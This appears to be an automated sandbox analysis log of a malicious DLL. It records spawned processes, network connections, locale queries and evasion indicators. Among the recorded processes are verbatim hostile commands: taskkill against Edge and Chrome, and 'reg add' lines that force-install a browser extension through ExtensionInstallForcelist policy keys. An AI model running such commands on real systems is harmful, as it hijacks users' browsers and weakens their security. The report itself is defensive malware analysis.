Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D885A208 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 34_2_00000166D885A208
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C66E86AC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 39_2_000001C9C66E86AC
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C66EDC78 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 39_2_000001C9C66EDC78
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C66F8100 SetUnhandledExceptionFilter, 39_2_000001C9C66F8100
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85BE1FC SetUnhandledExceptionFilter,UnhandledExceptionFilter,UnhandledExceptionFilter, 39_2_000001C9C85BE1FC
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85E6410 SetUnhandledExceptionFilter, 39_2_000001C9C85E6410

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 172.67.207.72 443 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 138.199.40.58 80 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 104.21.24.192 80 Jump to behavior
Contains functionality to launch a program with higher privileges
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046AC780 GetCurrentDirectoryW,GetModuleFileNameW,ShellExecuteExW,GetLastError,WaitForSingleObject,GetExitCodeProcess,CloseHandle, 6_2_046AC780
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\anuwhqTXGt.dll",#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM msedge.exe Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM chrome.exe Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\reg.exe reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Edge\ExtensionInstallForcelist /v 1 /t REG_SZ /d liffkepbndfkkknedglekeghaegocokk;file:///C:/Windows/Installer/{f4b964cf-1b7a-aa88-03cb-3533f33b6987}/c23a32abd836342a70b7f6c1aa74947e.2.E /reg:32 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\reg.exe reg add HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\ExtensionInstallForcelist /v 1 /t REG_SZ /d liffkepbndfkkknedglekeghaegocokk;file:///C:/Windows/Installer/{f4b964cf-1b7a-aa88-03cb-3533f33b6987}/c23a32abd836342a70b7f6c1aa74947e.2 /reg:32 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 "C:\Users\Public\wss_tmp\cr_ws_2.dll" main --install-run Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM msedge.exe Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM chrome.exe Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 "C:\Users\Public\wss_tmp\cr_ws_2.dll" main --install-run Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 "C:\Users\Public\fbe\fbegbhf.dll" main -c uninstall Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 "C:\Users\Public\fbe\fbegbhf.dll" main -c install-run Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM msedge.exe Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM chrome.exe Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 "C:\Users\Public\wss_tmp\cr_ws_2.dll" main --install-run Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 "C:\Users\Public\fbe\fbegbhf.dll" main -c uninstall Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown Jump to behavior
Uses taskkill to terminate processes
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM msedge.exe Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM chrome.exe Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM msedge.exe Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM chrome.exe Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM msedge.exe Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM chrome.exe Jump to behavior
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97888C0 OpenEventW,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateEventW, 33_2_0000021BD97888C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046AC8E0 AllocateAndInitializeSid,CheckTokenMembership,GetLastError,FreeSid, 6_2_046AC8E0
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046B499C cpuid 6_2_046B499C
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 6_2_046C8549
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 6_2_046C8672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 6_2_046C265B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 6_2_046C7EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 6_2_046C8778
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 6_2_046C8847
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoEx,FormatMessageA, 6_2_046B30F7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 6_2_046C81D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 6_2_046C8185
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 6_2_046C826B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 6_2_046C82F6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 6_2_046C2B05
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 7_2_04608549
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 7_2_04608672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 7_2_0460265B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 7_2_04607EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 7_2_04608778
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 7_2_04608847
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoEx,FormatMessageA, 7_2_045F30F7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 7_2_046081D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 7_2_04608185
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 7_2_0460826B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 7_2_046082F6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 7_2_04602B05
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 15_2_03472B05
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 15_2_0347826B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 15_2_034782F6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 15_2_034781D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 15_2_03478185
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 15_2_03478847
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoEx,FormatMessageA, 15_2_034630F7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 15_2_03478778
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 15_2_0347265B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 15_2_03478672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 15_2_03477EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 15_2_03478549
Source: C:\Windows\System32\rundll32.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 33_2_0000021BD979D88C
Source: C:\Windows\System32\rundll32.exe Code function: __crtGetLocaleInfoEx,__crtGetLocaleInfoEx,GetACP, 33_2_0000021BD97A1884
Source: C:\Windows\System32\rundll32.exe Code function: __crtGetLocaleInfoEx,malloc,__crtGetLocaleInfoEx,WideCharToMultiByte,free, 33_2_0000021BD979D720
Source: C:\Windows\System32\rundll32.exe Code function: __crtGetLocaleInfoEx, 33_2_0000021BD97A1938
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,__crtGetUserDefaultLocaleName,_getptd,_getptd,LcidFromHexString,GetLocaleInfoW, 33_2_0000021BD97A19A0
Source: C:\Windows\System32\rundll32.exe Code function: __crtDownlevelLocaleNameToLCID,GetLocaleInfoW, 33_2_0000021BD979DC04
Source: C:\Windows\System32\rundll32.exe Code function: EnumSystemLocalesW, 33_2_0000021BD979DB44
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,EnumSystemLocalesW, 33_2_0000021BD97A1DCC
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,_getptd,LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,TestDefaultLanguage, 33_2_0000021BD97A1E60
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,EnumSystemLocalesW, 33_2_0000021BD97A1D18
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,_getptd,LcidFromHexString,GetLocaleInfoW,TestDefaultLanguage, 33_2_0000021BD97A2090
Source: C:\Windows\System32\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 33_2_0000021BD97A21DC
Source: C:\Windows\System32\rundll32.exe Code function: ___lc_locale_name_func,__crtGetLocaleInfoEx, 33_2_0000021BD97C61D4
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,__lc_wcstolc,__get_qualified_locale_downlevel,__get_qualified_locale,__lc_lctowcs,__crtGetLocaleInfoEx,GetACP, 33_2_0000021BD9799298
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,GetLocaleInfoW, 33_2_0000021BD97A228C
Source: C:\Windows\System32\rundll32.exe Code function: GetLocaleInfoW, 33_2_0000021BD97D31B0
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,TestDefaultCountry,__crtGetLocaleInfoEx,TestDefaultCountry,_getptd,__crtGetLocaleInfoEx, 33_2_0000021BD97A1418
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,_getptd,TranslateName,GetLcidFromLangCountry,GetLcidFromLanguage,TranslateName,GetLcidFromLangCountry,GetLcidFromLanguage,_getptd,EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,__crtDownlevelLCIDToLocaleName,__crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,_itow_s, 33_2_0000021BD97A23D0
Source: C:\Windows\System32\rundll32.exe Code function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,__crtGetLocaleInfoEx,_calloc_crt,__crtGetLocaleInfoEx,free,__crtGetLocaleInfoEx, 33_2_0000021BD9794680
Source: C:\Windows\System32\rundll32.exe Code function: GetLocaleInfoEx,__crtDownlevelLocaleNameToLCID,GetLocaleInfoW, 34_2_00000166D8F4DC04
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,EnumSystemLocalesW, 34_2_00000166D8F51D18
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,_getptd,LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,TestDefaultLanguage, 34_2_00000166D8F51E60
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,EnumSystemLocalesW, 34_2_00000166D8F51DCC
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,_getptd,LcidFromHexString,GetLocaleInfoW,TestDefaultLanguage, 34_2_00000166D8F52090
Source: C:\Windows\System32\rundll32.exe Code function: EnumSystemLocalesW, 34_2_00000166D8F83198
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,__lc_wcstolc,__get_qualified_locale_downlevel,__get_qualified_locale,__lc_lctowcs,__crtGetLocaleInfoEx,GetACP, 34_2_00000166D8F49298
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,GetLocaleInfoW, 34_2_00000166D8F5228C
Source: C:\Windows\System32\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 34_2_00000166D8F521DC
Source: C:\Windows\System32\rundll32.exe Code function: ___lc_locale_name_func,__crtGetLocaleInfoEx, 34_2_00000166D8F761D4
Source: C:\Windows\System32\rundll32.exe Code function: GetLocaleInfoW, 34_2_00000166D8F831B0
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,TestDefaultCountry,__crtGetLocaleInfoEx,TestDefaultCountry,_getptd,__crtGetLocaleInfoEx, 34_2_00000166D8F51418
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,_getptd,TranslateName,GetLcidFromLangCountry,GetLcidFromLanguage,TranslateName,GetLcidFromLangCountry,GetLcidFromLanguage,_getptd,EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,__crtDownlevelLCIDToLocaleName,__crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,_itow_s, 34_2_00000166D8F523D0
Source: C:\Windows\System32\rundll32.exe Code function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,__crtGetLocaleInfoEx,_calloc_crt,__crtGetLocaleInfoEx,free,__crtGetLocaleInfoEx, 34_2_00000166D8F44680
Source: C:\Windows\System32\rundll32.exe Code function: __crtGetLocaleInfoEx,malloc,__crtGetLocaleInfoEx,WideCharToMultiByte,free, 34_2_00000166D8F4D720
Source: C:\Windows\System32\rundll32.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 34_2_00000166D8F4D88C
Source: C:\Windows\System32\rundll32.exe Code function: __crtGetLocaleInfoEx,__crtGetLocaleInfoEx,GetACP, 34_2_00000166D8F51884
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,__crtGetUserDefaultLocaleName,_getptd,_getptd,LcidFromHexString,GetLocaleInfoW, 34_2_00000166D8F519A0
Source: C:\Windows\System32\rundll32.exe Code function: __crtGetLocaleInfoEx, 34_2_00000166D8F51938
Source: C:\Windows\System32\rundll32.exe Code function: EnumSystemLocalesW, 34_2_00000166D8F4DB44
Source: C:\Windows\System32\rundll32.exe Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free, 39_2_000001C9C85BB1B8
Source: C:\Windows\System32\rundll32.exe Code function: EnumSystemLocalesW, 39_2_000001C9C85BF25C
Source: C:\Windows\System32\rundll32.exe Code function: __crtDownlevelLocaleNameToLCID,GetLocaleInfoW, 39_2_000001C9C85BF31C
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,__lc_wcstolc,__get_qualified_locale_downlevel,__get_qualified_locale,__lc_lctowcs,__crtGetLocaleInfoEx,GetACP,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson, 39_2_000001C9C85C3510
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,_getptd,LcidFromHexString,GetLocaleInfoW,TestDefaultLanguage, 39_2_000001C9C85D6A08
Source: C:\Windows\System32\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 39_2_000001C9C85D6B54
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,GetLocaleInfoW, 39_2_000001C9C85D6C04
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,_getptd,TranslateName,GetLcidFromLangCountry,GetLcidFromLanguage,TranslateName,GetLcidFromLangCountry,GetLcidFromLanguage,_getptd,EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,__crtDownlevelLCIDToLocaleName,__crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,_itow_s, 39_2_000001C9C85D6D48
Source: C:\Windows\System32\rundll32.exe Code function: __crtGetLocaleInfoEx,malloc,__crtGetLocaleInfoEx,WideCharToMultiByte,free, 39_2_000001C9C85CCF14
Source: C:\Windows\System32\rundll32.exe Code function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo, 39_2_000001C9C85D4F30
Source: C:\Windows\System32\rundll32.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 39_2_000001C9C85CD080
Source: C:\Windows\System32\rundll32.exe Code function: __crtGetLocaleInfoEx,__crtGetLocaleInfoEx,GetACP, 39_2_000001C9C85D61FC
Source: C:\Windows\System32\rundll32.exe Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free, 39_2_000001C9C85D4260
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,__crtGetUserDefaultLocaleName,_invoke_watson,_invoke_watson,_getptd,_getptd,LcidFromHexString,GetLocaleInfoW, 39_2_000001C9C85D6318
Source: C:\Windows\System32\rundll32.exe Code function: __crtGetLocaleInfoEx, 39_2_000001C9C85D62B0
Source: C:\Windows\System32\rundll32.exe Code function: GetLocaleInfoW, 39_2_000001C9C85E64A0
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,EnumSystemLocalesW, 39_2_000001C9C85D6690
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,EnumSystemLocalesW, 39_2_000001C9C85D6744
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,_getptd,LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,TestDefaultLanguage, 39_2_000001C9C85D67D8
Source: C:\Windows\System32\rundll32.exe Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free, 39_2_000001C9C85D47CC
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,TestDefaultCountry,__crtGetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,__crtGetLocaleInfoEx,_invoke_watson, 39_2_000001C9C85D5D90
Source: C:\Windows\System32\rundll32.exe Code function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,__crtGetLocaleInfoEx,_calloc_crt,__crtGetLocaleInfoEx,free,__crtGetLocaleInfoEx,_invoke_watson, 39_2_000001C9C85BFF20
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C: VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C: VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046B4E05 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 6_2_046B4E05
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97CC348 _lock,_get_daylight,_get_daylight,_get_daylight,___lc_codepage_func,_getenv_helper_nolock,free,_malloc_crt,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 33_2_0000021BD97CC348
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046A1130 SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,lstrcpynW,lstrcpynW,GetCommandLineW,lstrcpynW,GetModuleHandleW,CharNextW,lstrcpynW,GetTempPathW,GetTempPathW,lstrcatW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcpynW,lstrcpynW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,lstrcpynW,lstrcpynW,DeleteFileW,CopyFileW,CloseHandle,lstrcatW,lstrlenW,lstrcmpiW,GetFileAttributesW,lstrcpynW,LoadImageW,RegisterClassW,SystemParametersInfoW,CreateWindowExW,CloseHandle,FreeLibrary,GlobalFree,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx, 6_2_046A1130
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Changes security center settings (notifications, updates, antivirus, firewall)
Source: C:\Windows\System32\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Provider\Av\{D68DDC3A-831F-4fae-9E44-DA132C1ACF46} STATE Jump to behavior
Modifies Chrome's extension installation force list
Source: C:\Windows\SysWOW64\reg.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\google\chrome\ExtensionInstallForcelist
AV process strings found (often used to terminate AV products)
Source: svchost.exe, 0000000E.00000002.3168766710.000001DDF0502000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C858F0C0 __swprintf_l,strchr,strchr,inet_pton,strchr,_wcstoui64,strchr,_wcstoui64,getsockname,WSAGetLastError,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,listen,WSAGetLastError,htons,__swprintf_l,__swprintf_l, 39_2_000001C9C858F0C0
